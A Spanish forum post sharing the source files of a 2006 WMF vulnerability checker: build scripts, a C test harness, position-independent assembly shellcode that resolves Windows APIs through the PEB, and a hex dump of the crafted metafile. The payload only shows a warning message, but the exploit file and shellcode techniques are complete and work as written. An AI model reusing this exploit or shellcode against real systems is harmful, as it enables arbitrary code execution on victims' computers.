A ver si les sirven de algo los archivos del test de Ilfak Guilfanov; quizá les den una idea. El test tiene siete archivos. Dos .bat:
@echo off
rem this batch file builds a program to test for the vulnerability
rem -I...VC98\INCLUDE : header path of the installed Visual C++ (VC98 = VC++ 6 layout, presumably)
rem /GS-              : turns off the compiler's stack buffer-overrun check
rem /entry:WinMain    : WinMain is the raw entry point, so the CRT start-up code is skipped
rem /include:_copyr   : force the linker to keep the otherwise unreferenced copyright string
cl -IC:\PROGRA~1\MIAF9D~1\VC98\INCLUDE\ /O2 /GS- wmf_checker_hexblog.cpp /link /subsystem:windows kernel32.lib /entry:WinMain /include:_copyr
@echo off
rem this batch builds a WMF file which uses the vulnerability
rem to display a message on the screen
rem 1. assemble and link tell.asm into a small executable
tasm32 /m5 tell.asm
ulink tell.obj
rem 2. copy the raw code/data out of the EXE starting at file offset 0x200
rem    (presumably the start of the first section, past the PE headers)
bcopy tell.exe wmf_tail.wmf 0x200
rem 3. prepend the prepared metafile header; the tail ends with the
rem    terminating record emitted at the end of tell.asm
copy /b wmfhdr.wmf+wmf_tail.wmf wmf_tester.wmf
del wmf_tail.wmf
rem 4. turn the finished WMF into a C array (wmfdata.cpp) that the checker includes
bin2c wmf_tester.wmf wmfdata.cpp
Un archivo en C:
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "user32.lib")
typedef BYTE uchar;     // element type of the generated array in wmfdata.cpp
#include "wmfdata.cpp"  // static uchar array[] = {...}: the test WMF, produced by bin2c (see build script)
//---------------------------------------------------------------------------
// Copyright marker embedded in the binary. Nothing references it from code,
// so the build script forces the linker to keep it with /include:_copyr.
extern "C" const char copyr[] = "Copyright 2006 by Ilfak Guilfanov, ig@hexblog.com\0"
"http://www.hexblog.com";
// Path of the scratch enhanced metafile that WinMain creates and deletes.
static char tmp_name[MAX_PATH];
//---------------------------------------------------------------------------
// Report a fatal error in a message box (no caption) and terminate the
// process with exit code 1. Never returns.
//   message: text shown in the box
void error(const char *message)
{
MessageBox(NULL, message, NULL, MB_OK);
ExitProcess(1);
}
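//---------------------------------------------------------------------------
// Program entry point (GUI subsystem; /entry:WinMain in the build script, so
// there is no CRT start-up). Steps:
//   1. tell the user what the test does;
//   2. load the embedded test metafile (array, from wmfdata.cpp);
//   3. play it into a scratch enhanced metafile in the temp directory.
// On a vulnerable system PlayMetaFile does not return (see the comment at the
// call); if it does return, the "not vulnerable" message is shown.
// Returns 0 on the normal path. Any Win32 failure is reported through error(),
// which terminates the process with exit code 1.
int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
    MessageBox(NULL,
        "This program checks your system against the WMF vulnerability.\n"
        "\n"
        "It does not do anything harmful to your computer and does not\n"
        "alter any files on it.\n"
        "\n"
        "When you press OK, the test results will be displayed on the screen.\n"
        "\n"
        "Copyright 2006 by Ilfak Guilfanov, http://www.hexblog.com",
        "WMF Vulnerability Checker v1.1",
        MB_OK);

    // Temp directory for the scratch file. GetTempPath returns 0 on failure and
    // the required size (larger than the buffer) when the buffer is too small.
    char path[1024];
    DWORD len = GetTempPath(sizeof(path), path);
    if ( len == 0 || len > sizeof(path) )
        error("ERROR: could not determine the temporary directory");

    HMETAFILE h = SetMetaFileBitsEx(sizeof(array), (BYTE*)array);
    if ( h == NULL )
        error("ERROR: could not create metafile");

    RECT Rect; // rendering rectangle, anything will do
    Rect.left = 0;
    Rect.top = 0;
    Rect.bottom = 500;
    Rect.right = 500;

    // GetTempFileName creates the (empty) file, so on any later failure it has
    // to be removed again to keep the "does not alter any files" promise.
    if ( GetTempFileName(path, "ig", 0, tmp_name) == 0 )
    {
        DeleteMetaFile(h);
        error("ERROR: could not create temporary file");
    }
    HDC DC = CreateEnhMetaFile(NULL, tmp_name, &Rect, "Sample WMF");
    if ( DC == NULL )
    {
        DeleteMetaFile(h);
        DeleteFile(tmp_name);
        error("ERROR: could not create enhanced metafile");
    }

    // PlayMetaFile crashes in the case of vulnerability
    PlayMetaFile(DC, h);

    // Close the enhanced-metafile DC before deleting its backing file: while
    // the DC is open GDI can still hold the file, so deleting it first may
    // fail and leave the scratch file behind. The two GDI objects are freed
    // too (they were previously leaked).
    HENHMETAFILE emf = CloseEnhMetaFile(DC);
    if ( emf != NULL )
        DeleteEnhMetaFile(emf);
    DeleteMetaFile(h);
    DeleteFile(tmp_name);

    // (typo "You system" fixed)
    MessageBox(NULL,
        "Your system seems to be invulnerable to the WMF exploit.\n"
        "\n"
        "Please note that this program tries only one WMF exploit.\n"
        "In theory other vulnerabilities and exploits are possible,\n"
        "so stay vigilant and update your systems frequently!",
        "No vulnerability has been detected",
        MB_OK);
    return 0;
}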
Otro en ASM:
; tell.asm - TASM, Intel syntax, 32-bit flat model. Built by the second batch
; file (tasm32 /m5, then linked); the raw image is then appended to a WMF header.
; The code is position-independent: every data reference is computed relative
; to the label L, whose runtime address is recovered into ebp at start.
.386
.model flat
.code
; rpush xxx - push the runtime address of label xxx.
; Requires ebp = runtime address of L (set by start via call/pop). The
; difference xxx-L is an assembly-time constant, so the result is correct
; wherever the blob is loaded. Clobbers ecx.
rpush macro xxx
mov ecx, offset xxx - offset L
add ecx, ebp
push ecx
endm
endp
; Entry point of the blob.
; Register roles: ebp = address of L (relocation base used by rpush),
;                 ebx = kernel32 module handle,
;                 eax = most recently resolved address / call result.
; stdcall arguments are pushed right-to-left; qGetProcAddress takes
; (handle, name) with the name pushed first.
start:
call L                  ; push the address of L ...
L:
pop ebp                 ; ... and recover it: ebp = &L
call qGetKernel32Handle
mov ebx, eax            ; keep the kernel32 handle for later lookups
rpush aLoadLibrary
push ebx
call qGetProcAddress    ; eax = LoadLibraryA
rpush aUser32
call eax                ; eax = LoadLibraryA("user32.dll")
rpush aMessageBox
push eax
call qGetProcAddress    ; eax = MessageBoxA
push 0                  ; uType
push 0                  ; lpCaption
rpush message           ; lpText
push 0                  ; hWnd
call eax ; MessageBox
rpush aExitProcess
push ebx
call qGetProcAddress    ; eax = ExitProcess
push 1                  ; uExitCode
call eax ; ExitProcess
;-----------------------------------------------------------------------
; qGetKernel32Handle - obtain the kernel32 module base without imports.
; In:    nothing
; Out:   eax = module base
; Clobb: eax, flags (esi is saved/restored)
; fs:[30h] is the PEB pointer on NT-family Windows. The sign test chooses
; between two OS-specific layouts; the negative-pointer path presumably
; covers another Windows family (Win9x) - not verifiable from this file.
; The numeric offsets are structure offsets of the respective OS version.
;-----------------------------------------------------------------------
qGetKernel32Handle proc near
xor eax, eax
mov eax, fs:[eax+30h]   ; eax = PEB
test eax, eax
js short loc_169067     ; negative address -> alternative layout
push esi
mov eax, [eax+0Ch]      ; loader data
mov esi, [eax+1Ch]      ; head of a module list
lodsd                   ; eax = next list link, esi += 4
mov eax, [eax+8]        ; base of the module that entry describes
pop esi
retn
loc_169067:
mov eax, [eax+34h]
add eax, 7Ch
mov eax, [eax+3Ch]
retn
qGetKernel32Handle endp
;-----------------------------------------------------------------------
; qGetProcAddress - look a function up by name in a module's export table.
; In:    [esp+4] = module handle (image base), [esp+8] = ASCIIZ function name
; Out:   eax = function address, or 0 when the name is not exported
; Clobb: flags only - every other register is preserved by pusha/popa; the
;        result is written into the pusha-saved eax slot (var_4) so that popa
;        returns it.
; Stack: plain retn, so the two arguments are left on the stack after each
;        call; harmless here because start never returns.
;-----------------------------------------------------------------------
qGetProcAddress proc near
var_4= dword ptr -4     ; saved-eax slot, relative to esp+20h after pusha
arg_0= dword ptr 4 ; library handle
arg_4= dword ptr 8 ; function name
xor eax, eax            ; default result 0, captured by pusha
pusha
mov ebp, [esp+20h+arg_0] ; kernel32 handle (20h = 8 registers saved by pusha)
mov eax, [ebp+3Ch]      ; e_lfanew: offset of the PE header
mov edi, [ebp+eax+78h]  ; RVA of the export directory (first data directory)
add edi, ebp            ; edi -> export directory
mov ecx, [edi+18h]      ; number of names
mov ebx, [edi+20h]
add ebx, ebp            ; ebx -> table of name RVAs
nameloop:
jecxz short failed      ; no candidates left -> return 0
dec ecx                 ; ecx = index of the candidate tested in this pass
mov esi, [ebx+ecx*4]
add esi, ebp            ; esi -> exported name
push esi
push [esp+24h+arg_4]    ; requested name (24h: pusha frame plus the push above)
call strcmp
test eax, eax
jnz short nameloop      ; not equal -> keep scanning downward
mov ebx, [edi+24h]
add ebx, ebp            ; ebx -> ordinal table
mov cx, [ebx+ecx*2]     ; 16-bit ordinal; the upper half of ecx keeps the index's
                        ; upper bits, i.e. zero for any table below 64K names
mov ebx, [edi+1Ch]
add ebx, ebp            ; ebx -> function RVA table
mov eax, [ebx+ecx*4]
add eax, ebp            ; eax = function address
mov [esp+20h+var_4], eax ; overwrite the saved eax -> returned by popa
failed:
popa
retn
qGetProcAddress endp
;-----------------------------------------------------------------------
; strcmp - compare two ASCIIZ strings (stdcall: callee pops 8 bytes).
; In:    [esp+4] = s1, [esp+8] = s2 (arg_0/arg_4 once the ebp frame is set)
; Out:   eax = 0 if equal, otherwise the zero-extended byte difference
;        s1[i]-s2[i] at the first mismatching position (never negative,
;        because only al is written after the xor)
; Clobb: eax, flags; ebx/esi/edi/ebp are saved and restored
; Note:  not the C library function - there is no libc in this blob.
;-----------------------------------------------------------------------
strcmp proc near
arg_0= dword ptr 8      ; relative to ebp after push ebp / mov ebp,esp
arg_4= dword ptr 12
push ebp
mov ebp, esp
push esi
push edi
push ebx
mov esi, [ebp+arg_0]    ; esi -> s1
mov edi, [ebp+arg_4]    ; edi -> s2
xor eax, eax            ; clear the upper 24 bits of the result once
charloop:
mov al, [esi]
mov bl, [edi]
inc esi
inc edi
sub al, bl              ; al = s1[i] - s2[i]
jnz fret                ; mismatch -> return the difference
test bl, bl             ; equal so far: stop at the terminator with eax = 0
jnz charloop
fret:
pop ebx
pop edi
pop esi
pop ebp
ret 8                   ; discard both arguments
strcmp endp
; String data, reached through rpush. The four names are the export names
; resolved by qGetProcAddress; the data sits after the code so the image
; stays one flat blob.
aMessageBox db 'MessageBoxA', 0
aExitProcess db 'ExitProcess', 0
aLoadLibrary db 'LoadLibraryA', 0
aUser32 db 'user32.dll', 0
message db 'Your system is vulnerable to WMF exploits!', 0Ah   ; 0Ah = line feed
db 0Ah
db 'Please visit http://www.hexblog.com and install the hotfix!', 0
copyr db 'WMF Vulnerability test file by Ilfak Guilfanov', 0   ; marker only; not referenced by code
align 4
; last record in the file
; (the build script appends this image to wmfhdr.wmf, so this 3-word record
; with function 0 is what terminates the resulting metafile)
dd 3
dw 0
end start
Luego este archivo:
// Contents of wmf_tester.wmf as converted by bin2c (second batch file) and
// included into the checker through #include "wmfdata.cpp". The leading bytes
// come from wmfhdr.wmf; the tail is the raw image of tell.asm (its strings are
// readable as ASCII near the end), followed by the terminating record.
static uchar array[] = {
0x01,0x00,0x09,0x00,0x00,0x03,0xE5,0x00,0x00,0x00,0x06,0x00,0x3D,0x00,0x00,0x00,
0x00,0x00,0x11,0x00,0x00,0x00,0x26,0x06,0x09,0x00,0x16,0x00,0xE8,0x00,0x00,0x00,
0x00,0x5D,0xE8,0x4A,0x00,0x00,0x00,0x8B,0xD8,0xB9,0xF3,0x00,0x00,0x00,0x03,0xCD,
0x51,0x53,0xE8,0x5B,0x00,0x00,0x00,0xB9,0x00,0x01,0x00,0x00,0x03,0xCD,0x51,0xFF,
0xD0,0xB9,0xDB,0x00,0x00,0x00,0x03,0xCD,0x51,0x50,0xE8,0x43,0x00,0x00,0x00,0x6A,
0x00,0x6A,0x00,0xB9,0x0B,0x01,0x00,0x00,0x03,0xCD,0x51,0x6A,0x00,0xFF,0xD0,0xB9,
0xE7,0x00,0x00,0x00,0x03,0xCD,0x51,0x53,0xE8,0x25,0x00,0x00,0x00,0x6A,0x01,0xFF,
0xD0,0x33,0xC0,0x64,0x8B,0x40,0x30,0x85,0xC0,0x78,0x0D,0x56,0x8B,0x40,0x0C,0x8B,
0x70,0x1C,0xAD,0x8B,0x40,0x08,0x5E,0xC3,0x8B,0x40,0x34,0x83,0xC0,0x7C,0x8B,0x40,
0x3C,0xC3,0x33,0xC0,0x60,0x8B,0x6C,0x24,0x24,0x8B,0x45,0x3C,0x8B,0x7C,0x05,0x78,
0x03,0xFD,0x8B,0x4F,0x18,0x8B,0x5F,0x20,0x03,0xDD,0xE3,0x2B,0x49,0x8B,0x34,0x8B,
0x03,0xF5,0x56,0xFF,0x74,0x24,0x2C,0xE8,0x1D,0x00,0x00,0x00,0x85,0xC0,0x75,0xEA,
0x8B,0x5F,0x24,0x03,0xDD,0x66,0x8B,0x0C,0x4B,0x8B,0x5F,0x1C,0x03,0xDD,0x8B,0x04,
0x8B,0x03,0xC5,0x89,0x44,0x24,0x1C,0x61,0xC3,0x55,0x8B,0xEC,0x56,0x57,0x53,0x8B,
0x75,0x08,0x8B,0x7D,0x0C,0x33,0xC0,0x8A,0x06,0x8A,0x1F,0x46,0x47,0x2A,0xC3,0x75,
0x04,0x84,0xDB,0x75,0xF2,0x5B,0x5F,0x5E,0x5D,0xC2,0x08,0x00,0x4D,0x65,0x73,0x73,
0x61,0x67,0x65,0x42,0x6F,0x78,0x41,0x00,0x45,0x78,0x69,0x74,0x50,0x72,0x6F,0x63,
0x65,0x73,0x73,0x00,0x4C,0x6F,0x61,0x64,0x4C,0x69,0x62,0x72,0x61,0x72,0x79,0x41,
0x00,0x75,0x73,0x65,0x72,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x59,0x6F,0x75,0x72,
0x20,0x73,0x79,0x73,0x74,0x65,0x6D,0x20,0x69,0x73,0x20,0x76,0x75,0x6C,0x6E,0x65,
0x72,0x61,0x62,0x6C,0x65,0x20,0x74,0x6F,0x20,0x57,0x4D,0x46,0x20,0x65,0x78,0x70,
0x6C,0x6F,0x69,0x74,0x73,0x21,0x0A,0x0A,0x50,0x6C,0x65,0x61,0x73,0x65,0x20,0x76,
0x69,0x73,0x69,0x74,0x20,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,0x77,0x2E,
0x68,0x65,0x78,0x62,0x6C,0x6F,0x67,0x2E,0x63,0x6F,0x6D,0x20,0x61,0x6E,0x64,0x20,
0x69,0x6E,0x73,0x74,0x61,0x6C,0x6C,0x20,0x74,0x68,0x65,0x20,0x68,0x6F,0x74,0x66,
0x69,0x78,0x21,0x00,0x57,0x4D,0x46,0x20,0x56,0x75,0x6C,0x6E,0x65,0x72,0x61,0x62,
0x69,0x6C,0x69,0x74,0x79,0x20,0x74,0x65,0x73,0x74,0x20,0x66,0x69,0x6C,0x65,0x20,
0x62,0x79,0x20,0x49,0x6C,0x66,0x61,0x6B,0x20,0x47,0x75,0x69,0x6C,0x66,0x61,0x6E,
0x6F,0x76,0x00,0x90,0x03,0x00,0x00,0x00,0x00,0x00};
Y por último, dos imágenes WMF.
Espero que les sirva de ayuda para tener un mejor panorama.
Salu2
PD: cuando ejecuté el test en mi máquina, obviamente me apareció el diálogo de que soy vulnerable, y la pantalla se puso negra; intenté ver si había algún proceso corriendo para matarlo, pero este no existía, lo que me obligó a resetear el sistema. Luego de reiniciado, nuevamente «sos vulnerable» y a resetear de nuevo, por lo que me vi obligado a renombrar los archivos anteriores para que no se sigan ejecutando.
